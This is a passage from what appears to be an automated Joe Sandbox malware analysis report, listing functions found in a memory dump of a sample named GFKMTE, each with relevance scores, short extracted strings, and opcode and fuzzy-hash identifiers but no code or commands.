                                                                                                                                                  • API String ID: 0-4231502431
                                                                                                                                                  • Opcode ID: 5fbb6bef527fe335d087fc7f6d805f4cc54c2f1e195bbea3bb64526434bb80d8
                                                                                                                                                  • Instruction ID: 68b233eb1b8cd73528b6ce8a3157f79402783134e15e0844ab31110667977547
                                                                                                                                                  • Opcode Fuzzy Hash: 5fbb6bef527fe335d087fc7f6d805f4cc54c2f1e195bbea3bb64526434bb80d8
                                                                                                                                                  • Instruction Fuzzy Hash: 8C7290B4E002299FDB65DF68C954BDDBBB2BB89300F1481EAD848A7354DB319E81CF54
                                                                                                                                                  Function 0101AA57 Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 0d16db5340ade8e80deee87feb59d85f992677abdc2f97b31986e7fb10e08295
                                                                                                                                                  • Instruction ID: 61dd32c8a9115e087380acc3f8fc3a014736a0ca013a6510bb7324287c11cb9d
                                                                                                                                                  • Opcode Fuzzy Hash: 0d16db5340ade8e80deee87feb59d85f992677abdc2f97b31986e7fb10e08295
                                                                                                                                                  • Instruction Fuzzy Hash: 7A42F270A01258CFEB50DFA8C680A8EFBF2BF49311F55C199D488AB256CB349D85CF65
                                                                                                                                                  Function 01010869 Relevance: 1.8, Strings: 1, Instructions: 507COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 9e78d83c0f3086d8ed1d37ac78bb3f8d86ba02c21480e9a3b151e94ec786dec3
                                                                                                                                                  • Instruction ID: 46f09430bdce185477418f152d195e4190bf841878c7366c403fda7ce3aa4a16
                                                                                                                                                  • Opcode Fuzzy Hash: 9e78d83c0f3086d8ed1d37ac78bb3f8d86ba02c21480e9a3b151e94ec786dec3
                                                                                                                                                  • Instruction Fuzzy Hash: 6732C074900219CFEB50DF69C680A8EFBF2BF48311F55C199D488AB25ACB349D85CFA5
                                                                                                                                                  Function 0101AAB0 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 5aa27bc3c30061813fe27565604dd72fb537e6cab6c948c778da3bdaf0fd7adf
                                                                                                                                                  • Instruction ID: cabf704ac372285d0eedbe506de4084fa76ca5bc4dcbca6e3a9733015041d4ec
                                                                                                                                                  • Opcode Fuzzy Hash: 5aa27bc3c30061813fe27565604dd72fb537e6cab6c948c778da3bdaf0fd7adf
                                                                                                                                                  • Instruction Fuzzy Hash: FF510675E016588FEB58CF6AC84179EBBF3BFC9300F14C0AAD448A7255EB345A858F52
                                                                                                                                                  Function 0101BDD8 Relevance: .6, Instructions: 585COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 54e0a1b8fe1d0b2ea2f21ff64c411d2a2228a2a0023aff47de5866d9bee893f2
                                                                                                                                                  • Instruction ID: 0f3e99a6521a126857ac5e8a7375d002ef4470d99977be1991e13cce43a4792c
                                                                                                                                                  • Opcode Fuzzy Hash: 54e0a1b8fe1d0b2ea2f21ff64c411d2a2228a2a0023aff47de5866d9bee893f2
                                                                                                                                                  • Instruction Fuzzy Hash: 00529E74E01219CFEB24CFA9C984B9DBBF2BF48310F1486A9D809A7355D735AA81CF50
                                                                                                                                                  Function 01014458 Relevance: .6, Instructions: 560COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 09a5b0845b0d93a3c2c5b132fba660d29e5b74b6ec8c3a6688f472da32517a11
                                                                                                                                                  • Instruction ID: 8e8105f4346a186612c37227442e42fc3dfa393ac504fea2b3d0cdd6657c2e17
                                                                                                                                                  • Opcode Fuzzy Hash: 09a5b0845b0d93a3c2c5b132fba660d29e5b74b6ec8c3a6688f472da32517a11
                                                                                                                                                  • Instruction Fuzzy Hash: BF42C270A002198FDB54CF98CA80A8EFBF6BF88315F59C1A5D448AB265CB34DC85CF95
                                                                                                                                                  Function 01011B91 Relevance: .5, Instructions: 512COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be39dd5640e3c1567172bf72646937644d92cb20efcadaf07d9368c5bc3e55db
                                                                                                                                                  • Instruction ID: 10bd859d55ee2ade8f4919bf02232b1dc7bbfea1b74f464c13eb24c252775bb8
                                                                                                                                                  • Opcode Fuzzy Hash: be39dd5640e3c1567172bf72646937644d92cb20efcadaf07d9368c5bc3e55db
                                                                                                                                                  • Instruction Fuzzy Hash: 89429074E01229CFDB64CFA9C984B9DBBB2BF48310F2481A9D809A7355D775AE81CF50
                                                                                                                                                  Function 01015C38 Relevance: .5, Instructions: 511COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67b5f96efd1467a7341dd52a9fa0cca36f41c73e35eb88a574455a244c884d8c
                                                                                                                                                  • Instruction ID: ae3a118ed1bfa0d74104a940428c6d2ace26649740cce4bfaa93089f4ccfdf93
                                                                                                                                                  • Opcode Fuzzy Hash: 67b5f96efd1467a7341dd52a9fa0cca36f41c73e35eb88a574455a244c884d8c
                                                                                                                                                  • Instruction Fuzzy Hash: 71428E74E01228CFDB64CFA9C984B9DBBF2BF48310F1481A9E849A7355D775AA81CF50
                                                                                                                                                  Function 0101D860 Relevance: .5, Instructions: 500COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b6e5461c699a7568d7c12499dfb447db93d34bfaf9c03504473933e2f7bf6b05
                                                                                                                                                  • Instruction ID: baa42b894953c0d82ceda708994a934a2976844dcf6615089270a829b05a6f02
                                                                                                                                                  • Opcode Fuzzy Hash: b6e5461c699a7568d7c12499dfb447db93d34bfaf9c03504473933e2f7bf6b05
                                                                                                                                                  • Instruction Fuzzy Hash: 5532CF70900219CFEB50DFA9C684A8EFBF2BF49211F55C199C488AB256CB34DD81CFA5
                                                                                                                                                  Function 0101365B Relevance: .5, Instructions: 484COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 920602b293c3c8e7d6b776c00bc30ac77f0b3f74433e6502e2ef67e3e10f5642
                                                                                                                                                  • Instruction ID: 45a44c647e35ccda29b0045f3c7dcd9816582e64bbadce76ddb3fc25363ef0a8
                                                                                                                                                  • Opcode Fuzzy Hash: 920602b293c3c8e7d6b776c00bc30ac77f0b3f74433e6502e2ef67e3e10f5642
                                                                                                                                                  • Instruction Fuzzy Hash: 1D32DF70900219CFEB50DFA9C680A8EFBF2BF48221F55C199D488AB215DB34DD85CFA5
                                                                                                                                                  Function 01014448 Relevance: .4, Instructions: 420COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ac2462097385ee05882075f904fb6aeb2974e80d7612baecbd7fc47bfac891ad
                                                                                                                                                  • Instruction ID: 1f6a0081c43ffc827c339757d1f6b370077e0a032926e81b0113bfe1d91188fb
                                                                                                                                                  • Opcode Fuzzy Hash: ac2462097385ee05882075f904fb6aeb2974e80d7612baecbd7fc47bfac891ad
                                                                                                                                                  • Instruction Fuzzy Hash: C712E070A002598FEB54CFA9C684A8EFBF2BF88305F15C1A5D448AB265DB34DC85CF95
                                                                                                                                                  Function 01014453 Relevance: .4, Instructions: 418COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5c69c18086b8eddb92e32664b30a05b4b00ee8777ddf9df00c2a9ce262c5ca4
                                                                                                                                                  • Instruction ID: 3b5f1feba2e0bbeedbbeed61314c1e87624f9cb320b4c9b9513d4604bb98b3b5
                                                                                                                                                  • Opcode Fuzzy Hash: b5c69c18086b8eddb92e32664b30a05b4b00ee8777ddf9df00c2a9ce262c5ca4
                                                                                                                                                  • Instruction Fuzzy Hash: 8C12E070A002598FEB54CFA9C684A8EFBF2BF88305F15C1A5D448AB265DB34DC85CF95
                                                                                                                                                  Function 01014010 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a1cc07fc20a099a8b605026a4f84f4782f2859271b309da670737eda4d0fd914
                                                                                                                                                  • Instruction ID: e3e298ae9f517ed7e4d4a3d215ea3bf72a666885a9d9d7d18ce3351c98022f3e
                                                                                                                                                  • Opcode Fuzzy Hash: a1cc07fc20a099a8b605026a4f84f4782f2859271b309da670737eda4d0fd914
                                                                                                                                                  • Instruction Fuzzy Hash: 2EE10574E002198FDB14DFA8C580AAEBBB2FF89304F248169D554EB35AD735AD42CF61
                                                                                                                                                  Function 0101EEE7 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b1e2d408fb23a73b6e54f0be3cd95a9ef101020eccd1379bae349daadf48a4b
                                                                                                                                                  • Instruction ID: b3cdc526c9fa3fb4ff79ffedd286b6766c66912ec2b72196e45fdc006a4d5452
                                                                                                                                                  • Opcode Fuzzy Hash: 6b1e2d408fb23a73b6e54f0be3cd95a9ef101020eccd1379bae349daadf48a4b
                                                                                                                                                  • Instruction Fuzzy Hash: 6461BA74E01208DFDB54DFAAD994A9DBBF2FF89300F24806AE815AB365DB319941CF14
                                                                                                                                                  Function 0101D89A Relevance: .1, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: aaba3bfe2282a572fc2ea99e54bc81223ee0aa1a6f91b76bda05d8495533f9a0
                                                                                                                                                  • Instruction ID: d8e0ad16f801e2fb44ab1b9caf34684f60e4cc2fb1f5b29b28c13a4634a3ffeb
                                                                                                                                                  • Opcode Fuzzy Hash: aaba3bfe2282a572fc2ea99e54bc81223ee0aa1a6f91b76bda05d8495533f9a0
                                                                                                                                                  • Instruction Fuzzy Hash: 3341D875E006188FEB58DFAAC84179EBBB3BFC9300F14C0AAD55CA7255EA340A859F51
                                                                                                                                                  Function 01011000 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 3404754337914f0e563d4d343f5c4e9db0510b44ef3ee55dcfacd49c8e8e5a13
                                                                                                                                                  • Instruction ID: 4a3a9146aee4c6c396ac94c8e94eeb93d7d50179b764920ec8777a118df61934
                                                                                                                                                  • Opcode Fuzzy Hash: 3404754337914f0e563d4d343f5c4e9db0510b44ef3ee55dcfacd49c8e8e5a13
                                                                                                                                                  • Instruction Fuzzy Hash: 9F51A774E012199FDB08CFE9D884AAEFBB2FF88300F14812AE915A7364DB755946CF50
                                                                                                                                                  Function 0101B248 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: c604c044dc254e5fc8dc83af2aaa267b27b5e8adda25a54c197b19d593402012
                                                                                                                                                  • Instruction ID: 50574cf8a962e18fbc742a9d2fc37d845ccc7314dc25638912a3000981d43cdc
                                                                                                                                                  • Opcode Fuzzy Hash: c604c044dc254e5fc8dc83af2aaa267b27b5e8adda25a54c197b19d593402012
                                                                                                                                                  • Instruction Fuzzy Hash: 7351A674E002199FDB18CFA9D884AADFBF2FF88300F14812AE915A7364DB755945CF50
                                                                                                                                                  Function 01014CA0 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 6ba3e66fa6b6f7a2bf5271d8e1775da23e1764915f2ac946162d4ecfa01fa698
                                                                                                                                                  • Instruction ID: e1fe383ccc698b337ab73862cd4f22b6a79412987ae64b229c3d816ee0e59d73
                                                                                                                                                  • Opcode Fuzzy Hash: 6ba3e66fa6b6f7a2bf5271d8e1775da23e1764915f2ac946162d4ecfa01fa698
                                                                                                                                                  • Instruction Fuzzy Hash: 6751B674E002199FDB08DFA9D894AADFBF2FF88300F10812AE915AB364DB755946CF50
                                                                                                                                                  Function 0101B237 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: c7d33853884e687d62a29142943c57a5fed7fd296fa52af91e18f1ce33d0a62e
                                                                                                                                                  • Instruction ID: 4a1a2b1b555f37b2e7f6a1edfe0d8dadd61822e73aad97ee65625381e56f4a42
                                                                                                                                                  • Opcode Fuzzy Hash: c7d33853884e687d62a29142943c57a5fed7fd296fa52af91e18f1ce33d0a62e
                                                                                                                                                  • Instruction Fuzzy Hash: C751D774E002189FDB08CFE9D844ADEFBB2BF88300F14812AE915A7364DB755946CF50
                                                                                                                                                  Function 01010FF1 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 69831e6343e20fa2c7443dc493fbbbf681bf8ab9b19ca2aaeca945ab28f55d8d
                                                                                                                                                  • Instruction ID: 4ecae4c72979866c82e555b1feb5c519ce56d8bc259d22a2342090702f34c048
                                                                                                                                                  • Opcode Fuzzy Hash: 69831e6343e20fa2c7443dc493fbbbf681bf8ab9b19ca2aaeca945ab28f55d8d
                                                                                                                                                  • Instruction Fuzzy Hash: F951D674E012489FDB18CFE9D884A9EFBB2FF88300F14812AE915AB365DB755946CB50
                                                                                                                                                  Function 01014C9B Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: 3e12e85941b037fbd31905bb10112a256056ece5994f1e5c47fe1a3535a1c906
                                                                                                                                                  • Instruction ID: dce18ccdfbcdbc985cd81db7e8946bf464bb2be89085bcced7271ca00272bffc
                                                                                                                                                  • Opcode Fuzzy Hash: 3e12e85941b037fbd31905bb10112a256056ece5994f1e5c47fe1a3535a1c906
                                                                                                                                                  • Instruction Fuzzy Hash: 1F51C674E002199FDB18DFE9D884A9EFBB2FF88300F108129E915AB368DB755946CF50
                                                                                                                                                  Function 01013D90 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  • Opcode ID: 43afff5b0f72b5f0062a815ba7dd7fe0fa0436e8c1481e428d7216116f0b1e5e
                                                                                                                                                  • Instruction ID: 7ed4e656e4564988ade9bf325234cc214ba30bc250f21d80a79d63555a2a57c2
                                                                                                                                                  • Opcode Fuzzy Hash: 43afff5b0f72b5f0062a815ba7dd7fe0fa0436e8c1481e428d7216116f0b1e5e
                                                                                                                                                  • Instruction Fuzzy Hash: 0481F274E002188FDB04DFA9D584A9EBBF2FF88311F148069E855AB365DB349D42CF64
                                                                                                                                                  Function 01013D8B Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +
                                                                                                                                                  • API String ID: 0-1750050401
                                                                                                                                                  • Opcode ID: f291f112e558133b4d8750b01af8898397c4197641e5bd32570e685eaf6eb0c6
                                                                                                                                                  • Instruction ID: 05da5d9ac811263476497a100c4fc72b7aa71a0d75546602457fe30e15b9ea79
                                                                                                                                                  • Opcode Fuzzy Hash: f291f112e558133b4d8750b01af8898397c4197641e5bd32570e685eaf6eb0c6
                                                                                                                                                  • Instruction Fuzzy Hash: FA81F374E002188FDB04DFA9C584A9EBBF2FF88311F148069E855AB365DB349D42CF64
                                                                                                                                                  Function 01012348 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 62270e710245380cd5a3e23c226951ef94ab2ebe54309f5e212574ee3dd5b706
                                                                                                                                                  • Instruction ID: 0f3dd82ee097f95b62ba08f24bbb9b4e778d453cf63be09ca9459d971f96dc00
                                                                                                                                                  • Opcode Fuzzy Hash: 62270e710245380cd5a3e23c226951ef94ab2ebe54309f5e212574ee3dd5b706
                                                                                                                                                  • Instruction Fuzzy Hash: 5D61F47490020ADFD718DF99C984AAEFBB6FF88300B658694D8559B355CB34EE81CF90
                                                                                                                                                  Function 010163F0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 3afaa1bec2208184e24da782f90cca5fd05e4bef417846de91b39e35c7672c89
                                                                                                                                                  • Instruction ID: 26c1cc346006bb6bdbaab85d7c75f0597176fab9cb8815575909a8f1b5d267f8
                                                                                                                                                  • Opcode Fuzzy Hash: 3afaa1bec2208184e24da782f90cca5fd05e4bef417846de91b39e35c7672c89
                                                                                                                                                  • Instruction Fuzzy Hash: 4D611374A00206DFC714DF99C994AAEFBB6FF48300B658694D845AB359CB31EE81CF90
                                                                                                                                                  Function 0101C590 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: d4710e2c070fc70e6ba5a272eccf3dca9c4d54a30ce94534725a4ef45469afd8
                                                                                                                                                  • Instruction ID: 6fe3ce32f6e2f0661881c5f235416063db0cd616652a8c3c9542cda63b2ceef1
                                                                                                                                                  • Opcode Fuzzy Hash: d4710e2c070fc70e6ba5a272eccf3dca9c4d54a30ce94534725a4ef45469afd8
                                                                                                                                                  • Instruction Fuzzy Hash: E0611C74900209DFD714DF99CA849AEFBB6FF48300B658A94D85597359CB34EE81CFA0
                                                                                                                                                  Function 010163E0 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000001F.00000002.1646636720.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_31_2_1010000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 6d5b97f03d196e4bb7bab36a2e123bd44ac81209e7714c41884975e0c7f11c18
                                                                                                                                                  • Instruction ID: d0bb01527e83209ab6a792db0979c2cc8e540940c8d7c8e863add1ee1d6de15b
